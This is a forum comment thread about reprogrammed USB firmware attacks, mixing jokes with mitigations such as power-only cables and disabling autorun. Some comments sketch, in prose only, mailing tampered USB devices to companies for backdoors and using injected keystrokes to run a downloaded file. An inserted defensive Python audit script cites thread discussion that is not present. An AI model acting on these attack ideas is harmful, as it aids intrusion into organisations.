OK, this makes a bit more sense than the MSM version I read half an hour ago. In that article, they made it sound like USB keyboards were spreading a virus by reprogramming the USB controller chips on motherboards, which sounded a bit too far-fetched to me (maybe one brand could be vulnerable - but a widespread problem?). In the Ars story it sounds more like they are reprogramming the firmware in the USB device itself to act as a different device. Cute trick, possibly useful against a carefully chosen target, but the likelihood of a widespread attack seems minimal. And auditing your devices would be quite easy - just keep an eye on what device types are showing up in /sys/bus/usb or device manager.
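Added example (not part of any comment above): a sketch of the audit suggested in this comment, combined with the hybrid-device rule from blueg3's earlier reply (keyboard+mouse = ok, keyboard+webcam = reject). It reads each interface's `bInterfaceClass` from a Linux sysfs-style tree; the `PROFILES` allow-list, the function names and the sample tree are assumptions constructed for illustration.

```python
import os
import tempfile

# USB-IF base class codes, as found in each interface's bInterfaceClass file.
CLASS_NAMES = {0x01: "audio", 0x02: "communications", 0x03: "hid",
               0x08: "mass-storage", 0x09: "hub", 0x0A: "cdc-data",
               0x0E: "video"}

# Hypothetical allow-list: class combinations one physical device may expose.
PROFILES = [{"hid"}, {"mass-storage"}, {"hub"}, {"audio", "video"},
            {"communications", "cdc-data"}]


def read_interfaces(root="/sys/bus/usb/devices"):
    """Map each device (e.g. '1-2') to the class names of its interfaces."""
    devices = {}
    for entry in sorted(os.listdir(root)):
        if ":" not in entry:          # '1-2' is a device, '1-2:1.0' an interface
            continue
        path = os.path.join(root, entry, "bInterfaceClass")
        try:
            with open(path) as fh:
                code = int(fh.read().strip(), 16)
        except (OSError, ValueError):
            continue                  # interface vanished or unreadable
        name = CLASS_NAMES.get(code, "unknown-0x%02x" % code)
        devices.setdefault(entry.split(":")[0], set()).add(name)
    return devices


def violations(devices):
    """Return devices whose class set fits none of the allowed profiles."""
    return {dev: sorted(classes) for dev, classes in devices.items()
            if not any(classes <= profile for profile in PROFILES)}


def build_sample_tree(root):
    """Constructed sysfs-like tree used as offline sample input."""
    sample = {"1-1:1.0": "03", "1-1:1.1": "03",     # keyboard + mouse: ok
              "1-2:1.0": "08", "1-2:1.1": "03",     # storage + HID: flagged
              "1-3:1.0": "0e", "1-3:1.1": "01"}     # webcam with mic: ok
    for iface, code in sample.items():
        os.makedirs(os.path.join(root, iface))
        with open(os.path.join(root, iface, "bInterfaceClass"), "w") as fh:
            fh.write(code + "\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for dev, classes in violations(read_interfaces(tmp)).items():
            print("REVIEW %s: unexpected combination %s" % (dev, classes))
```

A device that enumerates as nothing but a keyboard fits the `{"hid"}` profile and passes, so this check only covers the hybrid case; the on-screen code confirmation discussed earlier in the thread addresses the other one.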

Re:Limited scope of vulnerability (1)

John Bokma (834313) | about 3 months ago | (#47575611)

just keep an eye on what device types are showing up in /sys/bus/usb or device manager.

I'll pass this on to my mother, thanks!

PS/2 (1)

kheldan (1460303) | about 3 months ago | (#47574747)

Time to dig those PS/2 keyboards and mice out of the back of the closet, I guess..

Re:PS/2 (1)

Blaskowicz (634489) | about 3 months ago | (#47574941)

I always choose a motherboard with both ports. Can be very useful even if you start out with both peripherals as USB. e.g. when my USB mouse broke, I got the older PS/2 one from a drawer and it still works very fine. Likewise I broke a keyb from 2010 or 2011 and ultimately replaced it with one from 1996 (which has grease and a space bar that needs serviced but registers all keys)

Re:PS/2 (1)

JazzLad (935151) | about 3 months ago | (#47575229)

Nah, you can always use a USB to PS/2 adapter - I found a supplier that sells them cheap!


Preemptive whooosh for the humour-impaired

How many have been bulk-mailed for Fortune 500s? (3, Insightful)

swb (14022) | about 3 months ago | (#47574753)

If you had the money/resources, you could create these things by the thousand and bulk-mail these to major companies. It would stand to reason that somebody would end up plugging them into their office computer, enabling a back door.

You could go even further and create hacked 5 port switches or access points and ship them off to big company branch offices, where users may be more likely to ignore standards or be short on resources and use those kinds of things anyway. You could put a return label on it for the office supply company or even the HQ office so that users thought it was something they had gotten by accident.

I'd bet in a lot of cases people would just say "sweet" and go ahead and use them in the office, giving you a back door. A switch or access point would have enough space inside that custom hardware could be inserted giving a lot better back door, like having your own computer on their network.

Re:How many have been bulk-mailed for Fortune 500s (0)

Anonymous Coward | about 3 months ago | (#47575615)

Been There Done That, discovered Ford has good opsec. 0/50 return on 512meg fobs.

Irongeek did similar presentations in 2010. (1)

Anonymous Coward | about 3 months ago | (#47574831)

How is this a significantly different concept from his PHUKD (Programmable HID USB Keystroke Dongle) devices from 2010?

http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle

(great acronym, btw)

Re:Irongeek did similar presentations in 2010. (0)

Anonymous Coward | about 3 months ago | (#47575049)

The difference is that this works on a large number of "normal" usb devices instead of a specifically programmable board. The issue is that all sorts of things like keyboards and usb drives let their usb firmware be replaced.

Doesn't sound like much of a leap (1)

bussdriver (620565) | about 3 months ago | (#47575373)

I was reading about more capable hacks back in 2005 back when there were people doing attacks against the generic device drivers for ... well, any type of USB device driver. Plus using it to pick up the keyboard or injecting data to mess with other devices on the bus.

TFA sounds to me like a much more limited attack and not all that creative since we've had a decade+ of USB devices that spoofed multiple devices -- I'm specifically thinking of those spoofed CD-ROM drives on some of those old Flash sticks.

Keyboards? doesn't sound all that useful at 1st glance... but finding a fool proof script to open up a terminal on a mac sounds like an interesting challenge. linux? too much variety. windows... getting to the run cmd is easy.

If you don't have a locked screen saver... which has been a MUST forever... a well written script could just be run from anywhere (just post it online, type in the URL and exec the file) which does most everything you need without admin access but could later also trigger some stuff to attempt privilege escalation attacks... like the police can already buy on usb flash (and whose software is signed by the OS vendor as trusted.)

What would really be interesting are attacks that unlock the screen saver... or some generic driver exploit that allows custom error messages to pop up on the OS... "The radiation shield on your monitor has broken, please sit back 4 ft to avoid being irradiated."

Although given the huge number of exploits and flaws in drivers--- I would like to see something push for greater quality and if that means popular USB stick exploits where it spoofs crap hardware to trigger automatic installation of crap drivers... would be nice to see hardware vendor drivers getting banned/noticed for poor quality.

Cheap mitigation of the problem: USB patch cables (0)

Anonymous Coward | about 3 months ago | (#47574833)

Add an extra pin to the device side connector. The pin is left unconnected on standard USB cables and firmware functions are disabled. Connect via a patch cable that swaps the data line for the patch line on the device side and the device will respond with firmware functions only, and disable regular operation.
This would effect an extremely cheap write protect switch. (after the chip redesign to accommodate the change)

Mom and Pop's heads would explode though, so it will never happen, but it seems technically feasible.
A usb bridge device that blocks firmware updates (via a protocol whitelist) would help in the interim. Not sure anything like that exists at the moment. (there are USB write blockers for use in forensics with mass storage devices. Presumably they could be adapted)

To say nothing of Apple cables (1)

gelfling (6534) | about 3 months ago | (#47574919)

Which are embedded entire computers.

To say nothing of your mother (1)

Anonymous Coward | about 3 months ago | (#47575209)

Who I embedded with my cable.

my bad experience (0)

Anonymous Coward | about 3 months ago | (#47574935)

Some years ago I was working at a major publicly traded company and corporate had requested a guy from our IT vendor do some maintenance on our servers. He requested access to our server room at which point I said no, but he escalated to my boss who allowed him to enter. Then he wanted access to our primary database server, to plug in a USB drive. I again said no, but the directive from corporate was to allow him to proceed. He plugged in his USB drive and I don't know why or how but the server immediately crashed and a hard drive had failed. It took us weeks to recover.

USB? Try that and everything else... (0)

Anonymous Coward | about 3 months ago | (#47575235)

"Trusted" hardware my ass! Has anyone even watched this presentation by Jacob Appelbaum?:

https://www.youtube.com/watch?v=dy3-QZLTpbQ

(includes talk about USB chip replacements for spyware purposes)

Still better than Firewire (0)

Anonymous Coward | about 3 months ago | (#47575395)

Still better than Firewire's direct external access to your system's memory.

The very first thing I do is disable autorun (1)

Trax3001BBS (2368736) | about 3 months ago | (#47575471)

Mainly because it's the first asking for access (Windows), I just no everything out. One of the largest security holes around and it's still fully active.

Give up complete computer security because I want music to play seconds before I could do it myself.

Do cellphone chargers require USB negotiation? (1)

smellsofbikes (890263) | about 3 months ago | (#47575487)

The most obvious route for disaster is a compromised cellphone charger, at least for my usage patterns. Since it'd take me about ten minutes to make a pez-candy-sized PCB with USB-micro-M and USB-micro-F connectors with only the power lines connected between them, I'm wondering if an android phone will charge when it's getting power, regardless of whether the USB is connected, or it won't charge until it's had a USB chat. I recall older devices being able to charge at lower-power (150mA?) but having to negotiate for 500mA. I'm perfectly happy to settle for 150mA for right now, until I can program a little AVR to fake the negotiation process and make me an air-gap charger. I don't have a usb traffic sniffer at work, and am about to lose my pcb fabrication equipment for a couple of weeks, so if I could find out today if it's worth making the pcb I'd do it this afternoon. Anyone know?

Re:Do cellphone chargers require USB negotiation? (1)

blueg3 (192743) | about 3 months ago | (#47575523)

You just need a resistor or two. Almost any USB-charged device will charge at 500 mA if it is connected to a dumb charger (no data lines), but in order to charge at a higher current (as many devices do), it needs to sense that it's connected to a charger that supports the higher current draw. So that it can be implemented without real USB-supporting electronics, that's just done with some simple electrical components. So you can make a charger that blocks the data lines but permits full-speed charging.

If you're okay with the slow version, just go out and buy a "power only" USB cable. They already exist. Alternately, this [int3.cc].

This sounds familiar... article from December 2012 (1)

EnOne (786812) | about 3 months ago | (#47575549)

The USB stick that thinks it’s a keyboard Read more: The USB stick that thinks it’s a keyboard PC Pro blog http://www.pcpro.co.uk/blogs/2... [pcpro.co.uk]